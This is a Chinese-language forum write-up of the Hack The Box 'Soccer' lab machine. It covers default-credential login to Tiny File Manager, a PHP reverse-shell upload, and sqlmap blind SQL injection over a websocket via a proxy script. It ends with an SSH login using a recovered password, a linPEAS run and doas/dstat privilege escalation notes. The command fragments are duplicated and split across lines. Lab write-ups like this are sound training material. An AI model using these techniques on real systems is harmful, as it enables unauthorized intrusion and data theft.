-
-
[原创] HTB Soccer (EASY)
-
发表于: 2022-12-25 23:29 1267
-
参考链接:
https://meowmeowattack.github.io/htb/soccer/
还是先扫端口
vim /etc/hosts 写入
跑一下目录
http://soccer.htb/tiny/
跑出来一个http://soccer.htb/tiny/uploads/ 访问不了,先放着
可以看到网站是H3K的,经过搜索发现是github上的开源项目
https://github.com/prasathmani/tinyfilemanager
试一下默认的账号密码admin:admin@123 成功登录
在uploads目录上传一个shell
/usr/share/webshells/php/php-reverse-shell.php
成功上传了shell 之后网页访问
http://soccer.htb/tiny/uploads/tmp/w.php
成功登上靶机
检查nginx ls /etc/nginx/sites-available/发现有服务soc-player.soccer.htb
http://soc-player.soccer.htb/signup
创建一个帐户,然后登录
登录后,看到页面http://soc-player.soccer.htb/check有一个票证检查机制,可以在其中搜索票证。检查 html 源代码发现此功能连接到 websocket
站点可能存在sqli漏洞。搜索sqli websocket可找到这篇文章:
https ://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
我们可以使用帖子中的 python 脚本作为代理,将 sqlmap 请求转发到 localhost:8081(在 python 脚本中定义)到目标主机的 websocket 端口 9091。为了使我们的设置工作,我们需要修改脚本
--flush-session清除缓存 --technique B 布尔注入
使用账号密码登录player PlayerOftheMatch2022
ssh player@10.10.11.194
使用linPEAS工具辅助提权
https://blog.csdn.net/weixin_43571641/article/details/124374117
https://github.com/carlospolop/PEASS-ng
https://github.com/carlospolop/PEASS-ng/releases/download/20221225/linpeas.sh
这样执行不会留下记录,本地要python3 -m http.server 80
脚本执行后可以看到很多东西
值得注意的是Doas
这个帖子中有关于其提权的东西
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#doas
man dstat查看dstat的手册
可以使用自定义plugin,以dstat_开头
rustscan
10.10
.
11.194
rustscan
10.10
.
11.194
dirsearch
-
u http:
/
/
soccer.htb
/
-
x
403
,
401
-
w
/
usr
/
share
/
wordlists
/
dirb
/
big.txt
dirsearch
-
u http:
/
/
soccer.htb
/
-
x
403
,
401
-
w
/
usr
/
share
/
wordlists
/
dirb
/
big.txt
var ws
=
new WebSocket(
"ws://soc-player.soccer.htb:9091"
);
var ws
=
new WebSocket(
"ws://soc-player.soccer.htb:9091"
);
ws_server
=
"ws://soc-player.soccer.htb:9091"
# line: 6
...
data
=
'{"id":"%s"}'
%
message
# line: 15, this format can be found by inspecting the traffic and see the search response
ws_server
=
"ws://soc-player.soccer.htb:9091"
# line: 6
...
data
=
'{"id":"%s"}'
%
message
# line: 15, this format can be found by inspecting the traffic and see the search response
python socer.py
sqlmap
-
u
"http://localhost:8081/?id=1"
-
p
"id"
python socer.py
sqlmap
-
u
"http://localhost:8081/?id=1"
-
p
"id"
sqlmap
-
u
"http://localhost:8081/?id=1"
-
p
"id"
-
-
batch
-
-
dbs
sqlmap
-
u
"http://localhost:8081/?id=1"
-
p
"id"
-
-
batch
-
-
dbs
sqlmap
-
u http:
/
/
localhost:
8081
/
?
id
=
1
-
p
id
-
-
random
-
agent
-
-
dbms mysql
-
-
dbs
-
-
technique B
-
-
level
5
-
-
risk
3
-
t
5
-
-
flush
-
session
sqlmap
-
u http:
/
/
localhost:
8081
/
?
id
=
1
-
p
id
-
-
random
-
agent
-
-
dbms mysql
-
-
dbs
-
-
technique B
-
-
level
5
-
-
risk
3
-
t
5
-
-
flush
-
session
[
*
] information_schema
[
*
] mysql
[
*
] performance_schema
[
*
] soccer_db
[
*
] sys
[
*
] information_schema
[
*
] mysql
[
*
] performance_schema
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!